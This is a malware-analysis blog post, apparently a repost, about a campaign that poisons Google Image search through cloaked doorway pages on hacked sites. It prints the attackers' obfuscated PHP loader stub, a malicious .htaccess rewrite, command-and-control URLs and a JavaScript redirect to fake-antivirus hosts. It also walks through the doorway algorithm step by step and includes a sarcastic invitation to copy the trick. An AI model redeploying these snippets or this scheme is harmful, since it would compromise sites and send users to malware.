Thousands of Hacked Sites Seriously Poison Google Image Search Results

This investigation began a few weeks ago, when I came across the following two threads in website security forums:

[badwarebusters.org] Lately I have been seeing a huge increase in the number of hacked sites appearing on google image search results that redirect to a fake Av scanner. more »»

[Google Webmaster Help] google image search results often has multiple infected / malware sites on the first SERP page. more »»

This is a well known problem. I blogged about such SEO poisoning attacks several times here. This time I decided to check what’s behind the reported increase in malicious image search results.

The attack uses cloaking to feed keyword-rich pages with hot-linked images to search engine bots and return a malicious JavaScript that redirects to fake AV sites to visitors that come from search engines.

Here’s a screenshot of a typical Google Image search results page where I highlighted suspicious results Pink frame: the image is hot-linked, Red frame: the results is outright malicious and redirects to a fake AV site. (I wish Google had similar highlighting to warn unsuspecting searchers.)

My goal was to find out

how the sites were compromised and what webmasters can do to prevent such infections

and whether it was possible to identify all compromised sites and have Google remove hijacked search results from its index.

Imgaaa

I began with checking home pages of a few known hacked sites trying to find some common patterns. Quite soon I discovered the following code at the very bottom of most of them:

<img heigth="1" width="1" border="0" src="hxxp://imgaaa .net/t.php?id=6214178">

Some alternative variants

<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168">
or
<iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe>
Update (May 6th, 2011) or
<img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=15433533">

The “imgaaa .net” domain didn’t resolve and the code looked suspicious so I decided to google for this imgaaa.

Quite soon I found this thread on WordPress support forum. It was the key to answering all my questions. I asked people to help with my investigation and they provided me with important internal information (e.g. .php files uploaded by hackers and some statistics). This information helped me reconstruct the whole scheme behind this attack, find thousands of infected sites and estimate the scale of the problem.

Update (May 6th, 2011): Some other domains on the same IP as imgaaa .net: imgbbb.net, imgccc .net, imgddd .net, ingeee .net.

Short description

1. Criminals use stolen FTP credentials to upload malicious .php files to compromised servers. (confirmed both by webmasters who found trojans on their computers and by hosting providers who found attack traces in FTP logs)

2. These files generate spammy web pages on-the-fly. As a keyword-rich content they use combination of top Google web search results and Image search results.

3. The generated spammy pages are interlinked to make sure Googlebot discovers them all. Moreover, they use Google’s suggested searches to generate links to new spammy pages (they will be generated on-the-fly when Googlebot follows the links). This simple scheme makes Google generate spam for its own index.

4. To have Google discover the spammy pages in the first place, criminals create blogs using free blogging services (e.g. http://blog.fc2.com/) where they post links to newly created spam-generating scripts on hacked sites.

5. Now the Google exploit in action: The combination of keywords from top Google search results for particular keywords and hot-linked images returned by Google Image search for the same keywords, makes the newly generated spammy pages appear at the top (the first page) of Google Image search results within a few days, hijacking results of sites that actually host (and usually own) the images.

This works like a charm. Exploiting this flaw, cybercriminals managed to hijack search results on the first pages of Google Image search for millions of keywords. I estimate that this trick generates at least15 million clicks on poisoned image search results every months. (calculations and the detailed description of how this Google exploit works can be found below)

6. What makes this a security problem is what happens when people click on such hijacked search results. The rogue script detects a visitor that comes from search results and substitutes the spammy page with some malicious JavaScript (that in most cases redirects to fake AV sites).

Detailed reconstruction of the attack

1. Uploading the PHP script.

Malicious hackers use stolen FTP login details to upload an obfuscated .php file to some directory on a server. They may upload several identical files with different names to different directories.

Here are the IP addresses that people usually find in FTP logs: 46.252.130.109 and 91.200.240.10.
Update (May 10th, 2010): Two comments mentioned one more IP: 91.200.241.200.

The .php script usually has a name that consists of either two random digits (e.g. 35.php) or three random letters (e.g. gmp.php).

The file contains about 11 Kb of an obfuscated code:

<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/ZmVSKRVBINtZbTiAR4Yd...skipped...wV/UO/k/6QMUUQ=='))); ?>

This file is responsible for generating spammy pages, pushing malicious content and uploading additional files to a server.

2. Preparation (alcobro)

Now the uploaded script should be registered and added to a network of compromised sites. To do so hackers make a request with the ?q=alcobro parameter.

This request prepares the hacked site. It creates the following directories:

/.log
/.log/compromiseddomain.com

where compromiseddomain.com is the domain name that I will use in this post as a replacement for the actual domain names of compromised sites.

Then it creates a file called /.log/compromiseddomain.com/xmlrpc.txt and writes the following line there: “bestnetblog.net“. This file contains the domain name of the remote server where the script can request a new malicious code from.

Then it tries to create an .htaccess file with the following content

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ script-name.php?q=$1 [L]
</IfModule>

where script-name.php is the path to the uploaded .php file (e.g. /wp-admin/26.php).

These rewrite rules define “SEO-friendly” links for doorway pages. Instead ofhxxp://compromiseddomain.com/wp-admin/26.php?q=search-keywords the link will read ashxxp://compromiseddomain.com/wp-admin/search-keywords/

This .htaccess file is only created if doesn’t already exist. Otherwise, ?q=search-keywords links will be used.

and finally the script contacts
hxxp://bestnetblog .net//logdomain.php?q=compromiseddomain.com to let the criminals know that thecompromiseddomain.com is ready to generate doorway pages.

Alternative maintenance requests

?dom100500=<domain.com> – this request updates the content of the xmlrpc.txt file with the domain name of a malicious server that hosts fresh redirect code.

Currently they use the following domain names: love-adamcom.net, love-adambiz.net, love-adamorg.net, love-adaminfo.net – all 184.82.169.171

?up100500=<some-value> – this request turns the script into an upload form.

On one compromised site they used this functionality to upload a web shell script called avuv.php.

Processing q requests

The main function of the script is to process ?q=search-keywords requests ( or /search-keywords in case of the
appropriate .htaccess rules).

The script distinguishes three different situations:

Request from a search engine bot (determined by the IP address ). In this case the script generates a keyword-rich page (see the algorithm below) and feeds it to the bot.

Visitor that clicked on a search engine result on Google, Yahoo or Bing (determined by the referrer header). In this case the script returns a malicious JavaScript.
Note 1: the malicious JavaScript is not returned if the search query contains the “site:” operator (to hide the malicious content from site owners and tools that rely on this operator)
Note 2: the malicious JavaScript is always returned if your browser is Opera (even if you don’t come from a search engine)

The rest requests are simply redirected to a homepage.

Perfect doorway generator (algorithm)

To generate a web page that can hijack image search results for a “search-keywords” query, the script does the following:

1. Get descriptions of top 50 Google web search results for “search keywords“.

2. Shuffle the words in those descriptions randomly to get some unique text.

The resulting text is not intelligible but it’s enough to exploit that Google’s flaw. Here’s an excerpt from a real spammy page that targets the “sarpagandha” keyword:

“It has been used since ages in Print e-mail ayurveda herb finder miscategorized Tablets, sarpagandha experts belongs Advice on ayurvedic medicines herbalsarpagandha Linn, family botanical name rauvolfia serpentina…”

3. Get top 20 Google Image search results for “search keywords” and extract links to image files.

4. Generate <img> tags for each extracted image link. E.g.

<img src="http://www.hijacked-site1.com/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">

5. Shuffle the generated <img> tags (to change their order)

6. Break the generated in the step #2 text into sentences and mix them with the <img> tags. This will be a keyword-rich HTML code with hot-linked images for the “search keyword” query.

7. To facilitate discovery of new pages and to provide them with incoming links, each spammy page contains a section that links to 30 most recently generated doorway pages.

8. Get up to 10 suggested keyword from Google autocomplete and use them to generate links to doorway pages that target these suggested keywords. This way Google itself suggests what search keywords should be targeted. Spammers only need to come up with a few initial keyword — the rest Google will do itself.

9. At the bottom of each spammy block, there is a section of links to 6 alternative pages for the same “search keywords”. The links look like this:

<p><a href="http://compromiseddomain.com/search-keywords&page=2" title="Search Keywords">Search Keywords - Page 2</a> | ...skipped.... >Search Keywords - Page 7</a></p>

All those pages are generated the same way. The only difference is the page #2 takes image links from the second page of Google Image search results, the page #3 from the third page of image search results, and so on. The textual parts of these pages use absolutely the same words, only in a different (random) order.

10. Spammy block template. Then the algorithm concatenates all the generated parts into a single block that look like this:

<h1>SEARCH KEYWORDS</h1>
suggested links
links to 30 most 
recently generated links
keyword-rich text with hot-linked images
links to alternative pages

11. Spammy page template. So that this generated spammy block doesn’t look too outlandish, it is inserted in the middle of the HTML code a real homepage of the compromised site.

The HTML template is stored in the .log/compromiseddomain.com/shab100500.txt file. It’s basically the HTML code of the site’s homepage with the <REPLACEME> placeholder, that will be later replaced with a generated spammy block.

A few more important modification to this template will be made when the script generates spammy pages:

the original <title> tag is replaced with <title>Search Keywords</title>

and the <meta name=”googlebot” content=”noarchive”> tag is inserted — that’s why you don’t see cached copies of the pages in Google search results, which definitely makes the problem diagnostic more difficult for webmasters. (Fortunately, they can still use the “Fetch as Googlebot” tool in Google Webmaster Tools)

Caching

Once the spammy page is generated, it is saved on disk so that all subsequent requests to the same page will be served directly from cache.

The cached pages are saved in the .log/compromiseddomain.com/ directory and have the following filenames:

The first page: .log/compromiseddomain.com/search-keywords.html
Page #N : .log/compromiseddomain.com/search-keywords.htmlN where N is a number from 2 to 7

Since the spammy pages are only generated for search engine bots, the number of cache files provides us with quite an accurate number of indexed spammy pages. (It is not always possible to come up with Google search queries that return only spammy pages and at the same time all spammy pages on a particular domain.)

I’ve checked cache directories on many hacked sites. I rarely saw less that 1,000 files there. Some sites even had more than 100,000 cache files created in less than three months.

Sidenote: The spammy pages are only generated when Googlebot tries to index them. Moreover, three Google’s services are utilized in the spam generation process. Effectively, Google generates spam that poisons its index itself! What an irony!

Malicious redirects.

Let’s get back to real people who click on poisoned image search results. When the script detects a victim (visitor from Google, Yahoo or Bing) it returns some malicious code instead of the requested spammy page.

This malicious code is stored in the .log/compromiseddomain.com/iog.txt file and looks like this

var url = "hxxp://wcwrwpea .cz.cc/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";
if (window!=top) {top.location.href = url;} else document.location= url;

Note how it breaks out of the frames. Google’s Image search interstitial pages can’t stop the redirect.

This file is being updated every 30 minutes. Remember the xmlrpc.txt file that contains the address of the remote server? This is where this address is used.

Every 30 minutes the script pulls new malicious script from
hxxp://remote-server-from-xmlrpc-txt/badcompany.php?q=compromiseddomain.com/script-name.php

So far the only changes are the domain names of sites where the script redirects web surfers to. Here are just a few domains used in this attack:

oppuvjyz .cz.cc, sljngefn .cz.cc, qtmgqqxh .cz.cc, qeiskziv .cz.cc, jfdevxvo.cz.cc, zpggpimd .cz.cc, uywgxabe .cz.cc, hdmibzur .cz.cc, kjqxyxiu .cz.cc, wcwrwpea .cz.cc

These domains have a very short life time so security tools that rely on blacklists simply don’t have
enough time to flag them and update their blacklists. That’s why Google’s Safe Browsing database that is used by many modern web browsers is of very little help here. Moreover Google even have hard time finding and blacklisting the malicious doorway pages on hacked sites. Less than 5% of them are currently flagged.

Note, although the doorway pages currently return malicious scripts that redirect to fake AV sites, they can easily change to any other type of JavaScript: it can be some browser exploit or a redirect some shady content (e.g. porn, pirated stuff, counterfeit drugs, gambling sites, etc).

Statistics and estimates

This scheme works extremely well for spammers. It exploits the flaw in Google Image search so well that the doorway pages inevitably make it to the first pages of image search results for almost every keyword combination that consist of at least a couple of words. Let me prove it with some numbers.

I have compiled a list of 5,000+ hacked sites (the list is incomplete) with millions of doorway pages. And I have a very long list of keywords targeted by the spammy pages. I tried to check more than a hundred of random Google Images searches from that list — for most of them (~90%) I found at least one hijacked search result on the first page. In about 50% of cases there were more than one poisoned search results within the top 20. For some keywords, poisoned search results occupied more than half positions on the first page of results. Results below top 20 were poisoned even more seriously.

And the main problem is not that cybercrooks managed to seriously poison Google Image search results but the fact that many people do click on such results results and get exposed to malicious content.

I’ve received logs from some hacked sites and can estimate the traffic Google sends to such doorway pages.

An average hacked site has ~1,000 indexed doorway pages.
There are 5,000+ hacked sites that I know of.
This gives us 5,000,000+ indexed doorway pages.
An average doorway page has 1 visitor from Google every 10 days.
So all doorway pages should have 500,000+ visits from Google every day
Or 15,000,000+ visits every month

Note, this probably is underestimation since I used numbers on the lower side.

And don’t forget that this is statistics of this particular SEO poisoning attack. There are currently at least a few more other similar active attacks that make things significantly worse.

Here’s a representative example: a small hacked Croatian site with PageRank 0. FTP logs showed that it had been hacked on March 18th. According to access logs, on March 19th Google started to index doorways pages. During the next 5 weeks it has indexed 27,200+ doorway pages on this site. During the same 5 weeks Google Image search has sent 140,000+ visitors to this small site. Very impressive, isn’t it?

The most efficient black hat trick ever

I would call this the most efficient and easy to implement black hat SEO trick to drive search traffic to a site. And you don’t actually need to hack someone else’s sites — you can implement this on your own site with similar results. Of course, you should be ready that someone reports your site to Google and they remove it from their index altogether, but you can still enjoy having thousands of visitors literally for free before this happens.

But don’t be late to the party! Many black hats already exploit this flaw in Google Image search. It may happen that most of Google Image search results will be hijacked and re-hijacked quite soon and normal people will simply stop using Google for image searches.

To Google

Google, I hope you hear my sarcasm. Is there any chance
you’ll close this security hole?

I know, you can’t remove hot-linking sites from image search results altogether for numerous reasons (although it would definitely fix the problem), but you should consider some other steps that could mitigate the problem and you should do it ASAP!

Here are just a few ideas that come to my head:

Give some preference to sites that actually host image files. Don’t encourage image theft.

Improve cloaking and web spam (pages with unintelligible texts should not rank high!) detection.

Cooperate with the anti-malware team and have them scan fresh discovered pages that hot-link more than, say, three images. (I hope that malware scanners will eventually be able to detect malicious behavior on such doorway pages)

Meanwhile, I’m sending my list of 5,000+ hacked sites to Google’s web spam team and to their webmaster trends analysts. Hope, you’ll be able to make a good use of it and remove these doorways pages from search results.

To Webmasters

To make sure your site is not abused by cybercrooks you should:

regularly check what pages Google has indexed on your site
- use the “site:” searches
- check statistics in Google Webmaster Tools

Regularly check what search keywords people use to find your site. Google Analytics won’t help here as it only tracks data for your legitimate web pages.
- Use search data in Google Webmaster Tools
- Regularly check raw access logs or tools that analyze access logs (e.g. Webalizer)

Scan your server for suspicious files and directories. It’s a good idea to have some sort of integrity control or version control so that you can easily detect unauthorized changes.

Don’t save passwords in FTP programs. Change passwords every time you find malware on your computer.

Make sure your computer is free from malware. Use a reputable anti-virus tool and regularly update it.

Keep your operating system, web browser and all browser plugins (e.g. Java, Flash) up-to-date. This will help minimize risk of malware infections that may result in site password theft.

If your site happens to be one of the compromised sites that host malicious doorway pages:

Thoroughly scan your computer for malware

Once your computer is clean, change all site passwords (even for sites that don’t seem to be compromised yet). Don’t save passwords in FTP clients – most of them can’t protect your passwords from malware. Consider using password managers (like KeePass) that encrypt all data with a master password.

Use SFTP instead of FTP if possible.

Now remove the doorway .php script, .htaccess file with rewrite rules if it was created, the .log/directory and all its content.

You should also scan your server for suspicious files that might have been uploaded to your server using the ?up100500 requests.

##

Did you ever come across Google Image search results that redirected to malicious sites? Maybe your site was a victim of a similar attack? Or maybe this flaw seriously affects your site because spammers hijack your search results in Google Image search?

Original article from sites:

http://malware.im/thousands-of-hacked-sites-seriously-poison-google-image-search-results/

Search This Blog

Nanang Berag Belog Sekali